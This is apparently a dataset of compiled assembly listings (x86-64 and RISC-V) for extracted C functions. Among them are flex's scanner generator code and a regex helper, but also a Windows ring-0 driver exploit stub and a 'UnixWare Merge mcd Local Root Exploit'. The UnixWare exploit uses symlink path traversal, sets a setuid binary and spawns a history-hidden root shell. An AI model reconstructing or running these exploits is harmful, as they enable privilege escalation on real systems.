"YY_CHAR yy_c;\n" .LC12: .string "for ( yy_c = %s;" .section .rodata.str1.8 .align 8 .LC13: .string " (yy_trans_info = &yy_current_state[(unsigned int) yy_c])->" .section .rodata.str1.1 .LC14: .string "yy_verify == yy_c;" .LC15: .string " yy_c = %s )" .section .rodata.str1.8 .align 8 .LC16: .string "yy_current_state += yy_trans_info->yy_nxt;" .section .rodata.str1.1 .LC17: .string "do" .section .rodata.str1.8 .align 8 .LC18: .string "while ( yy_base[yy_current_state] != %d );\n" .align 8 .LC19: .string "while ( yy_current_state != %d );\n" .align 8 .LC20: .string "yy_cp = YY_G(yy_last_accepting_cpos);" .align 8 .LC21: .string "yy_current_state = YY_G(yy_last_accepting_state);" .text .p2align 4 .globl gen_next_match .type gen_next_match, @function gen_next_match: .LFB24: .cfi_startproc endbr64 leaq .LC0(%rip), %rsi cmpq $0, useecs(%rip) leaq .LC2(%rip), %rax pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 cmove %rsi, %rax pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 leaq .LC3(%rip), %rdx pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 movq %rax, %rbp leaq .LC1(%rip), %rax cmove %rax, %rdx cmpq $0, fulltbl(%rip) je .L3 cmpq $0, gentables(%rip) movq %rbp, %rsi jne .L18 leaq .LC5(%rip), %rdi call indent_put2s@PLT .L5: xorl %eax, %eax call indent_up@PLT cmpq $0, num_backing_up(%rip) jle .L6 leaq .LC6(%rip), %rdi call indent_puts@PLT xorl %eax, %eax call gen_backing_up@PLT movl $10, %edi call outc@PLT .L6: leaq .LC7(%rip), %rdi call indent_puts@PLT cmpq $0, num_backing_up(%rip) jle .L7 leaq .LC8(%rip), %rdi call indent_puts@PLT .L7: xorl %eax, %eax call indent_down@PLT movl $10, %edi call outc@PLT popq %rbp .cfi_remember_state .cfi_def_cfa_offset 24 leaq .LC9(%rip), %rdi popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 jmp indent_puts@PLT .p2align 4,,10 .p2align 3 .L3: .cfi_restore_state cmpq $0, fullspd(%rip) je .L8 leaq .LC6(%rip), %r13 movq %rdx, %r12 movq %r13, %rdi call indent_puts@PLT leaq .LC10(%rip), %rdi call indent_puts@PLT leaq .LC11(%rip), %rdi call indent_puts@PLT movq %rbp, %rsi leaq .LC12(%rip), %rdi call indent_put2s@PLT leaq .LC13(%rip), %rdi call indent_puts@PLT leaq .LC14(%rip), %rdi call indent_puts@PLT movq %r12, %rsi leaq .LC15(%rip), %rdi call indent_put2s@PLT xorl %eax, %eax call indent_up@PLT cmpq $0, num_backing_up(%rip) jg .L19 .L9: leaq .LC16(%rip), %rdi leaq .LC8(%rip), %rbp call indent_puts@PLT cmpq $0, num_backing_up(%rip) jg .L20 .L10: xorl %eax, %eax call indent_down@PLT movq %rbp, %rdi popq %rbp .cfi_remember_state .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 jmp indent_puts@PLT .p2align 4,,10 .p2align 3 .L8: .cfi_restore_state leaq .LC17(%rip), %rdi call indent_puts@PLT xorl %eax, %eax call indent_up@PLT leaq .LC6(%rip), %rdi call indent_puts@PLT xorl %edi, %edi call gen_next_state@PLT leaq .LC7(%rip), %rdi call indent_puts@PLT leaq .LC8(%rip), %rdi call indent_puts@PLT xorl %eax, %eax call indent_down@PLT xorl %eax, %eax call do_indent@PLT cmpq $0, interactive(%rip) jne .L21 movl jamstate(%rip), %esi leaq .LC19(%rip), %rdi call out_dec@PLT .L12: movl reject(%rip), %eax testl %eax, %eax jne .L1 cmpq $0, interactive(%rip) je .L22 .L1: popq %rbp .cfi_remember_state .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L18: .cfi_restore_state leaq .LC4(%rip), %rdi call indent_put2s@PLT jmp .L5 .p2align 4,,10 .p2align 3 .L21: movl jambase(%rip), %esi leaq .LC18(%rip), %rdi call out_dec@PLT jmp .L12 .p2align 4,,10 .p2align 3 .L20: movl $10, %edi call outc@PLT xorl %eax, %eax call gen_backing_up@PLT movq %rbp, %rdi call indent_puts@PLT jmp .L10 .p2align 4,,10 .p2align 3 .L19: movq %r13, %rdi call indent_puts@PLT jmp .L9 .p2align 4,,10 .p2align 3 .L22: leaq .LC20(%rip), %rdi call indent_puts@PLT popq %rbp .cfi_def_cfa_offset 24 leaq .LC21(%rip), %rdi popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 jmp indent_puts@PLT .cfi_endproc .LFE24: .size gen_next_match, .-gen_next_match .globl useecs .bss .align 8 .type useecs, @object .size useecs, 8 useecs: .zero 8 .globl reject .align 4 .type reject, @object .size reject, 4 reject: .zero 4 .globl num_backing_up .align 8 .type num_backing_up, @object .size num_backing_up, 8 num_backing_up: .zero 8 .globl jamstate .align 4 .type jamstate, @object .size jamstate, 4 jamstate: .zero 4 .globl jambase .align 4 .type jambase, @object .size jambase, 4 jambase: .zero 4 .globl interactive .align 8 .type interactive, @object .size interactive, 8 interactive: .zero 8 .globl gentables .align 8 .type gentables, @object .size gentables, 8 gentables: .zero 8 .globl fulltbl .align 8 .type fulltbl, @object .size fulltbl, 8 fulltbl: .zero 8 .globl fullspd .align 8 .type fullspd, @object .size fullspd, 8 fullspd: .zero 8 .globl g_aug_volatile_3340 .data .align 4 .type g_aug_volatile_3340, @object .size g_aug_volatile_3340, 4 g_aug_volatile_3340: .long 1 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_gen.c_gen_next_match_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "YY_SC_TO_UI(*yy_cp)" .align 3 .LC1: .string "YY_SC_TO_UI(*++yy_cp)" .align 3 .LC2: .string "yy_ec[YY_SC_TO_UI(*yy_cp)] " .align 3 .LC3: .string "yy_ec[YY_SC_TO_UI(*--yy_cp)] " .align 3 .LC4: .string "while ( (yy_current_state = yy_nxt[yy_current_state][ %s ]) > 0 )" .align 3 .LC5: .string "while ( (yy_current_state = yy_nxt[yy_current_state*YY_NXT_LOLEN + %s ]) > 0 )" .align 3 .LC6: .string "{" .align 3 .LC7: .string "++yy_cp;" .align 3 .LC8: .string "}" .align 3 .LC9: .string "yy_current_state = -yy_current_state;" .align 3 .LC10: .string "yyconst struct yy_trans_info *yy_trans_info;\n" .align 3 .LC11: .string "YY_CHAR yy_c;\n" .align 3 .LC12: .string "for ( yy_c = %s;" .align 3 .LC13: .string " (yy_trans_info = &yy_current_state[(unsigned int) yy_c])->" .align 3 .LC14: .string "yy_verify == yy_c;" .align 3 .LC15: .string " yy_c = %s )" .align 3 .LC16: .string "yy_current_state += yy_trans_info->yy_nxt;" .align 3 .LC17: .string "do" .align 3 .LC18: .string "while ( yy_base[yy_current_state] != %d );\n" .align 3 .LC19: .string "while ( yy_current_state != %d );\n" .align 3 .LC20: .string "yy_cp = YY_G(yy_last_accepting_cpos);" .align 3 .LC21: .string "yy_current_state = YY_G(yy_last_accepting_state);" .text .align 1 .globl gen_next_match .type gen_next_match, @function gen_next_match: addi sp,sp,-48 sd s0,32(sp) lla s0,.LANCHOR0 ld a5,0(s0) sd ra,40(sp) sd s1,24(sp) beq a5,zero,.L14 ld a5,8(s0) lla a1,.LC2 lla s1,.LC3 beq a5,zero,.L3 .L19: ld a5,16(s0) bne a5,zero,.L18 lla a0,.LC5 call indent_put2s@plt .L5: call indent_up@plt ld a5,24(s0) ble a5,zero,.L6 lla a0,.LC6 call indent_puts@plt call gen_backing_up@plt li a0,10 call outc@plt .L6: lla a0,.LC7 call indent_puts@plt ld a5,24(s0) ble a5,zero,.L7 lla a0,.LC8 call indent_puts@plt .L7: call indent_down@plt li a0,10 call outc@plt lla a0,.LC9 .L16: ld s0,32(sp) ld ra,40(sp) ld s1,24(sp) addi sp,sp,48 tail indent_puts@plt .L14: ld a5,8(s0) lla a1,.LC0 lla s1,.LC1 bne a5,zero,.L19 .L3: ld a5,32(s0) sd a1,8(sp) beq a5,zero,.L8 lla a0,.LC6 call indent_puts@plt lla a0,.LC10 call indent_puts@plt lla a0,.LC11 call indent_puts@plt ld a1,8(sp) lla a0,.LC12 call indent_put2s@plt lla a0,.LC13 call indent_puts@plt lla a0,.LC14 call indent_puts@plt mv a1,s1 lla a0,.LC15 call indent_put2s@plt call indent_up@plt ld a5,24(s0) bgt a5,zero,.L20 lla a0,.LC16 call indent_puts@plt ld a5,24(s0) bgt a5,zero,.L21 .L10: call indent_down@plt lla a0,.LC8 .L24: ld s0,32(sp) ld ra,40(sp) ld s1,24(sp) addi sp,sp,48 tail indent_puts@plt .L8: lla a0,.LC17 call indent_puts@plt call indent_up@plt lla a0,.LC6 call indent_puts@plt li a0,0 call gen_next_state@plt lla a0,.LC7 call indent_puts@plt lla a0,.LC8 call indent_puts@plt call indent_down@plt call do_indent@plt ld a5,40(s0) bne a5,zero,.L22 lw a1,52(s0) lla a0,.LC19 call out_dec@plt .L12: lw a5,56(s0) bne a5,zero,.L1 ld a5,40(s0) beq a5,zero,.L23 .L1: ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) addi sp,sp,48 jr ra .L18: lla a0,.LC4 call indent_put2s@plt j .L5 .L22: lw a1,48(s0) lla a0,.LC18 call out_dec@plt j .L12 .L21: li a0,10 call outc@plt call gen_backing_up@plt lla a0,.LC8 call indent_puts@plt call indent_down@plt lla a0,.LC8 j .L24 .L20: lla a0,.LC6 call indent_puts@plt lla a0,.LC16 call indent_puts@plt ld a5,24(s0) ble a5,zero,.L10 j .L21 .L23: lla a0,.LC20 call indent_puts@plt lla a0,.LC21 j .L16 .size gen_next_match, .-gen_next_match .globl useecs .globl reject .globl num_backing_up .globl jamstate .globl jambase .globl interactive .globl gentables .globl fulltbl .globl fullspd .globl g_aug_volatile_3340 .data .align 2 .type g_aug_volatile_3340, @object .size g_aug_volatile_3340, 4 g_aug_volatile_3340: .word 1 .bss .align 3 .set .LANCHOR0,. + 0 .type useecs, @object .size useecs, 8 useecs: .zero 8 .type fulltbl, @object .size fulltbl, 8 fulltbl: .zero 8 .type gentables, @object .size gentables, 8 gentables: .zero 8 .type num_backing_up, @object .size num_backing_up, 8 num_backing_up: .zero 8 .type fullspd, @object .size fullspd, 8 fullspd: .zero 8 .type interactive, @object .size interactive, 8 interactive: .zero 8 .type jambase, @object .size jambase, 4 jambase: .zero 4 .type jamstate, @object .size jamstate, 4 jamstate: .zero 4 .type reject, @object .size reject, 4 reject: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_29070.c_Ring0Function_aug_v3_6
.file "extr_29070.c_Ring0Function_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\n" .LC1: .string "++---[RING0]------" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string "[*] Message: [.oO Hello From Ring0! Oo.]\n" .align 8 .LC3: .string "[!] Cleaning up Hooked Function\n" .section .rodata.str1.1 .LC4: .string "\\\\.\\Kmxstart" .LC5: .string "[!] Exploit Terminated\n" .LC6: .string "-----[RING0]------" .text .p2align 4 .globl Ring0Function .type Ring0Function, @function Ring0Function: .LFB1: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 leaq .LC0(%rip), %rbp movq %rbp, %rdi subq $80, %rsp .cfi_def_cfa_offset 96 movq %fs:40, %rax movq %rax, 72(%rsp) xorl %eax, %eax call printf@PLT leaq .LC1(%rip), %rdi call printf@PLT movq %rbp, %rdi call printf@PLT leaq .LC2(%rip), %rdi call printf@PLT leaq .LC3(%rip), %rdi call printf@PLT subq $8, %rsp .cfi_def_cfa_offset 104 xorl %r9d, %r9d xorl %ecx, %ecx movq $0, 24(%rsp) xorl %edx, %edx xorl %esi, %esi movl $3, %r8d movq $0, 32(%rsp) leaq .LC4(%rip), %rdi movq $0, 40(%rsp) movq $0, 48(%rsp) movq $0, 56(%rsp) movq $0, 64(%rsp) movq $0, 72(%rsp) pushq $0 .cfi_def_cfa_offset 112 call CreateFile@PLT leaq 32(%rsp), %r8 pushq $0 .cfi_def_cfa_offset 120 movl $68, %r9d movl %eax, %edi movl %r8d, %edx movl $24, %ecx movl $-2063597564, %esi leaq 32(%rsp), %rax pushq %rax .cfi_def_cfa_offset 128 call DeviceIoControl@PLT addq $32, %rsp .cfi_def_cfa_offset 96 leaq .LC5(%rip), %rdi call printf@PLT leaq .LC6(%rip), %rdi call printf@PLT movl $1, %edi call exit@PLT movq 72(%rsp), %rax subq %fs:40, %rax jne .L5 addq $80, %rsp .cfi_remember_state .cfi_def_cfa_offset 16 xorl %eax, %eax popq %rbp .cfi_def_cfa_offset 8 ret .L5: .cfi_restore_state call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size Ring0Function, .-Ring0Function .globl g_aug_volatile_9523 .data .align 4 .type g_aug_volatile_9523, @object .size g_aug_volatile_9523, 4 g_aug_volatile_9523: .long 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_29070.c_Ring0Function_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\n" .align 3 .LC1: .string "++---[RING0]------" .align 3 .LC2: .string "[*] Message: [.oO Hello From Ring0! Oo.]\n" .align 3 .LC3: .string "[!] Cleaning up Hooked Function\n" .align 3 .LC4: .string "\\\\.\\Kmxstart" .align 3 .LC5: .string "[!] Exploit Terminated\n" .align 3 .LC6: .string "-----[RING0]------" .text .align 1 .globl Ring0Function .type Ring0Function, @function Ring0Function: addi sp,sp,-80 sd s0,64(sp) la s0,__stack_chk_guard ld a5, 0(s0) sd a5, 56(sp) li a5, 0 lla a0,.LC0 sd ra,72(sp) call printf@plt lla a0,.LC1 call printf@plt lla a0,.LC0 call printf@plt lla a0,.LC2 call printf@plt lla a0,.LC3 call printf@plt li a6,0 li a5,0 li a4,3 li a3,0 li a2,0 li a1,0 lla a0,.LC4 sd zero,8(sp) sd zero,16(sp) sd zero,24(sp) sd zero,32(sp) sd zero,40(sp) sd zero,48(sp) sd zero,56(sp) call CreateFile@plt addi a4,sp,64 addiw a4,a4,-56 li a1,-2063597568 li a5,68 mv a2,a4 li a7,0 mv a6,sp li a3,24 addi a1,a1,4 call DeviceIoControl@plt lla a0,.LC5 call printf@plt lla a0,.LC6 call printf@plt li a0,1 call exit@plt ld a4, 56(sp) ld a5, 0(s0) xor a5, a4, a5 li a4, 0 bne a5,zero,.L5 ld ra,72(sp) ld s0,64(sp) li a0,0 addi sp,sp,80 jr ra .L5: call __stack_chk_fail@plt .size Ring0Function, .-Ring0Function .globl g_aug_volatile_9523 .data .align 2 .type g_aug_volatile_9523, @object .size g_aug_volatile_9523, 4 g_aug_volatile_9523: .word 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_5357.c_main_aug_v3_7
.file "extr_5357.c_main_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "HISTFILE=/dev/null" .LC1: .string "-i" .LC2: .string "sh" .LC3: .string "/bin/sh" .LC4: .string "[-] sh: %s\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC5: .string "---------------------------------------" .align 8 .LC6: .string " UnixWare Merge mcd Local Root Exploit" .section .rodata.str1.1 .LC7: .string " By qaaz" .LC8: .string "[-] %s: %s\n" .LC9: .string "%s/%s" .LC10: .string "/dev/cdrom/../../%s/%s" .LC11: .string "PATH" .LC12: .string "PATH=.:%s" .LC13: .string "-d" .LC14: .string "-u" .LC15: .string "[*] Waiting for privs..." .LC16: .string "[+] Enjoy" .LC17: .string "woot" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 leaq -16384(%rsp), %r11 .cfi_def_cfa 11, 16424 .LPSRL0: subq $4096, %rsp orq $0, (%rsp) cmpq %r11, %rsp jne .LPSRL0 .cfi_def_cfa_register 7 subq $40, %rsp .cfi_def_cfa_offset 16464 movq %fs:40, %rax movq %rax, 16408(%rsp) xorl %eax, %eax movq %rsi, %rbx call geteuid@PLT testq %rax, %rax jne .L2 call geteuid@PLT movq %rax, %rdi call setuid@PLT xorl %eax, %eax call getegid@PLT movl %eax, %edi call setgid@PLT movq BIN(%rip), %rsi movq (%rbx), %rdi call strstr@PLT testq %rax, %rax jne .L18 leaq .LC0(%rip), %rdi call putenv@PLT xorl %ecx, %ecx leaq .LC1(%rip), %rdx xorl %eax, %eax leaq .LC2(%rip), %rsi leaq .LC3(%rip), %rdi call execl@PLT movl errno(%rip), %edi call strerror@PLT leaq .LC4(%rip), %rdi movq %rax, %rsi xorl %eax, %eax call printf@PLT movl $1, %eax .L1: movq 16408(%rsp), %rdx subq %fs:40, %rdx jne .L19 addq $16424, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L18: .cfi_restore_state xorl %edi, %edi call umask@PLT movq BIN(%rip), %rdi movl $3, %edx xorl %esi, %esi call chown@PLT movq BIN(%rip), %rdi movl $3583, %esi call chmod@PLT xorl %eax, %eax call getppid@PLT movl $15, %esi movl %eax, %edi call kill@PLT xorl %eax, %eax jmp .L1 .L2: leaq .LC5(%rip), %rbp movq %rbp, %rdi call puts@PLT leaq .LC6(%rip), %rdi call puts@PLT leaq .LC7(%rip), %rdi call puts@PLT movq %rbp, %rdi call puts@PLT movl EX_OK(%rip), %esi movq TARGET(%rip), %rdi call access@PLT testq %rax, %rax js .L16 movq LNK(%rip), %rsi movl DEV(%rip), %edi call symlink@PLT testq %rax, %rax js .L20 movq DIR(%rip), %rsi leaq 16(%rsp), %r12 xorl %eax, %eax leaq 4112(%rsp), %rbp movq %r12, %rdi leaq 8208(%rsp), %rbx call sprintf@PLT movq %r12, %rdx movq %rbp, %rdi xorl %eax, %eax movq BIN(%rip), %rcx leaq .LC9(%rip), %rsi call sprintf@PLT movq LNK(%rip), %r13 xorl %edi, %edi movl $4096, %esi call getcwd@PLT leaq .LC10(%rip), %rdx movl $4096, %esi movq %rbx, %rdi movq %rax, %rcx movq %r13, %r8 leaq 12304(%rsp), %r13 xorl %eax, %eax call snprintf@PLT leaq .LC11(%rip), %rdi call getenv@PLT leaq .LC12(%rip), %rdx movl $4096, %esi movq %r13, %rdi movq %rax, %rcx xorl %eax, %eax call snprintf@PLT call fork@PLT testl %eax, %eax je .L21 leaq .LC15(%rip), %rdi leaq 8(%rsp), %rbx call puts@PLT jmp .L8 .p2align 4,,10 .p2align 3 .L10: movl 8(%rsp), %eax andl $3583, %eax cmpl $3583, %eax je .L22 movl $1, %edi call sleep@PLT .L8: movq %rbx, %rsi movq %rbp, %rdi call stat@PLT testq %rax, %rax je .L10 movl errno(%rip), %edi call strerror@PLT movq %rbp, %rsi leaq .LC8(%rip), %rdi movq %rax, %rdx xorl %eax, %eax call printf@PLT movq LNK(%rip), %rdi call unlink@PLT movl $0, 12(%rsp) movl 12(%rsp), %eax cmpl $4, %eax jg .L11 .p2align 4,,10 .p2align 3 .L12: movl 12(%rsp), %eax subl $1, %eax movl %eax, 12(%rsp) movl 12(%rsp), %eax cmpl $4, %eax jle .L12 .L11: xorl %eax, %eax jmp .L1 .L21: movq %r12, %rdi call chdir@PLT movq %r13, %rdi call putenv@PLT xorl %r9d, %r9d movq %rbx, %r8 xorl %eax, %eax movq TARGET(%rip), %rdi leaq .LC13(%rip), %rcx leaq .LC14(%rip), %rdx movq %rdi, %rsi call execl@PLT .L16: movl errno(%rip), %edi call strerror@PLT movq TARGET(%rip), %rsi leaq .LC8(%rip), %rdi movq %rax, %rdx xorl %eax, %eax call printf@PLT movl $1, %eax jmp .L1 .L20: movl errno(%rip), %edi call strerror@PLT movq LNK(%rip), %rsi leaq .LC8(%rip), %rdi movq %rax, %rdx xorl %eax, %eax call printf@PLT movl $1, %eax jmp .L1 .L22: leaq .LC16(%rip), %rdi call puts@PLT movq LNK(%rip), %rdi call unlink@PLT xorl %edx, %edx leaq .LC17(%rip), %rsi xorl %eax, %eax movq %rbp, %rdi call execl@PLT movl errno(%rip), %edi call strerror@PLT movq %rbp, %rsi leaq .LC8(%rip), %rdi movq %rax, %rdx xorl %eax, %eax call printf@PLT movl $1, %eax jmp .L1 .L19: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl errno .bss .align 4 .type errno, @object .size errno, 4 errno: .zero 4 .globl TARGET .align 8 .type TARGET, @object .size TARGET, 8 TARGET: .zero 8 .globl LNK .align 8 .type LNK, @object .size LNK, 8 LNK: .zero 8 .globl EX_OK .align 4 .type EX_OK, @object .size EX_OK, 4 EX_OK: .zero 4 .globl DIR .align 8 .type DIR, @object .size DIR, 8 DIR: .zero 8 .globl DEV .align 4 .type DEV, @object .size DEV, 4 DEV: .zero 4 .globl BIN .align 8 .type BIN, @object .size BIN, 8 BIN: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_5357.c_main_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "HISTFILE=/dev/null" .align 3 .LC1: .string "-i" .align 3 .LC2: .string "sh" .align 3 .LC3: .string "/bin/sh" .align 3 .LC4: .string "[-] sh: %s\n" .align 3 .LC5: .string "---------------------------------------" .align 3 .LC6: .string " UnixWare Merge mcd Local Root Exploit" .align 3 .LC7: .string " By qaaz" .align 3 .LC8: .string "[-] %s: %s\n" .align 3 .LC9: .string "%s/%s" .align 3 .LC10: .string "/dev/cdrom/../../%s/%s" .align 3 .LC11: .string "PATH" .align 3 .LC12: .string "PATH=.:%s" .align 3 .LC13: .string "-d" .align 3 .LC14: .string "-u" .align 3 .LC15: .string "[*] Waiting for privs..." .align 3 .LC16: .string "[+] Enjoy" .align 3 .LC17: .string "woot" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-80 li a5,16384 li t0,-16384 sd s0,64(sp) sd s3,40(sp) sd ra,72(sp) sd s1,56(sp) sd s2,48(sp) sd s4,32(sp) sd s5,24(sp) sd s6,16(sp) addi a4,a5,8 add sp,sp,t0 la s3,__stack_chk_guard add a4,a4,sp ld a5, 0(s3) sd a5, 0(a4) li a5, 0 mv s0,a1 call geteuid@plt bne a0,zero,.L2 call geteuid@plt call setuid@plt call getegid@plt call setgid@plt lla s1,.LANCHOR0 ld a1,0(s1) ld a0,0(s0) call strstr@plt bne a0,zero,.L18 lla a0,.LC0 call putenv@plt li a3,0 lla a2,.LC1 lla a1,.LC2 lla a0,.LC3 call execl@plt lw a0,8(s1) call strerror@plt mv a1,a0 lla a0,.LC4 call printf@plt li a0,1 .L4: li a5,16384 addi a5,a5,8 add a5,a5,sp ld a4, 0(a5) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L19 li t0,16384 add sp,sp,t0 ld ra,72(sp) ld s0,64(sp) ld s1,56(sp) ld s2,48(sp) ld s3,40(sp) ld s4,32(sp) ld s5,24(sp) ld s6,16(sp) addi sp,sp,80 jr ra .L18: li a0,0 call umask@plt ld a0,0(s1) li a2,3 li a1,0 call chown@plt ld a0,0(s1) li a1,4096 addi a1,a1,-513 call chmod@plt call getppid@plt li a1,15 call kill@plt li a0,0 j .L4 .L2: lla a0,.LC5 call puts@plt lla a0,.LC6 call puts@plt lla a0,.LC7 call puts@plt lla a0,.LC5 call puts@plt lla s0,.LANCHOR0 lw a1,12(s0) ld a0,16(s0) call access@plt blt a0,zero,.L20 ld a1,24(s0) lw a0,32(s0) call symlink@plt blt a0,zero,.L21 li s6,16384 li s1,-16384 addi s1,s1,-8 addi a5,s6,16 add a5,a5,s1 ld a1,40(s0) add s1,a5,sp mv a0,s1 call sprintf@plt li s2,-12288 addi s2,s2,-8 addi a5,s6,16 add a5,a5,s2 ld a3,0(s0) add s2,a5,sp mv a2,s1 lla a1,.LC9 mv a0,s2 call sprintf@plt li a1,4096 li a0,0 call getcwd@plt li s4,-8192 addi s4,s4,-8 addi a5,s6,16 add a5,a5,s4 ld a4,24(s0) add s4,a5,sp mv a3,a0 lla a2,.LC10 li a1,4096 mv a0,s4 call snprintf@plt lla a0,.LC11 call getenv@plt li s5,-4096 addi s5,s5,-8 addi a5,s6,16 add a5,a5,s5 add s5,a5,sp mv a3,a0 lla a2,.LC12 li a1,4096 mv a0,s5 call snprintf@plt call fork@plt beq a0,zero,.L22 lla a0,.LC15 call puts@plt li s6,-16384 li a4,16384 addi s4,s6,-16 addi a5,a4,16 add a5,a5,s4 add s4,a5,sp addi a5,a4,16 add a5,a5,s6 li s1,4096 add s5,a5,sp addi s1,s1,-513 j .L8 .L10: lw a5,-16(s5) and a5,a5,s1 beq a5,s1,.L23 li a0,1 call sleep@plt .L8: mv a1,s4 mv a0,s2 call stat@plt beq a0,zero,.L10 lw a0,8(s0) call strerror@plt mv a2,a0 mv a1,s2 lla a0,.LC8 call printf@plt ld a0,24(s0) call unlink@plt li a3,16384 addi a5,a3,16 add a5,a5,s6 add s6,a5,sp sw zero,-12(s6) lw a4,-12(s6) li a5,4 bgt a4,a5,.L11 li a4,-16384 addi a5,a3,16 add a5,a5,a4 add a4,a5,sp li a3,4 .L12: lw a5,-12(a4) addiw a5,a5,-1 sw a5,-12(a4) lw a5,-12(a4) ble a5,a3,.L12 .L11: li a0,0 j .L4 .L22: mv a0,s1 call chdir@plt mv a0,s5 call putenv@plt ld a1,16(s0) li a5,0 mv a4,s4 lla a3,.LC13 lla a2,.LC14 mv a0,a1 call execl@plt lw a0,8(s0) ld s0,16(s0) call strerror@plt mv a2,a0 mv a1,s0 lla a0,.LC8 call printf@plt li a0,1 j .L4 .L20: ld s1,16(s0) .L16: lw a0,8(s0) call strerror@plt mv a2,a0 mv a1,s1 lla a0,.LC8 call printf@plt li a0,1 j .L4 .L21: ld s1,24(s0) j .L16 .L23: lla a0,.LC16 call puts@plt ld a0,24(s0) call unlink@plt li a2,0 lla a1,.LC17 mv a0,s2 call execl@plt lw a0,8(s0) call strerror@plt mv a2,a0 mv a1,s2 lla a0,.LC8 call printf@plt li a0,1 j .L4 .L19: call __stack_chk_fail@plt .size main, .-main .globl errno .globl TARGET .globl LNK .globl EX_OK .globl DIR .globl DEV .globl BIN .bss .align 3 .set .LANCHOR0,. + 0 .type BIN, @object .size BIN, 8 BIN: .zero 8 .type errno, @object .size errno, 4 errno: .zero 4 .type EX_OK, @object .size EX_OK, 4 EX_OK: .zero 4 .type TARGET, @object .size TARGET, 8 TARGET: .zero 8 .type LNK, @object .size LNK, 8 LNK: .zero 8 .type DEV, @object .size DEV, 4 DEV: .zero 4 .zero 4 .type DIR, @object .size DIR, 8 DIR: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_helper.c_helper_string_replace_if_exists_v_aug_v3_8
.file "extr_helper.c_helper_string_replace_if_exists_v_aug_v3_8.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "\\[(.*)({[-\\w]+})(.*)\\]|({[\\w-]+})" .align 8 .LC1: .string "Failed to parse: '%s'\nError: '%s'" .text .p2align 4 .globl helper_string_replace_if_exists_v .type helper_string_replace_if_exists_v, @function helper_string_replace_if_exists_v: .LFB24: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 xorl %edx, %edx pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 xorl %r12d, %r12d pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 movq %rdi, %rbp leaq .LC0(%rip), %rdi pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 movq %rsi, %rbx xorl %esi, %esi subq $40, %rsp .cfi_def_cfa_offset 80 movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax leaq 16(%rsp), %r13 movq $0, 16(%rsp) movq %r13, %rcx call g_regex_new@PLT cmpq $0, 16(%rsp) movq %rax, %rdi je .L12 .L2: call g_regex_unref@PLT movq 16(%rsp), %rax testq %rax, %rax jne .L13 .L1: movq 24(%rsp), %rax subq %fs:40, %rax jne .L14 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 movq %r12, %rax popq %rbx 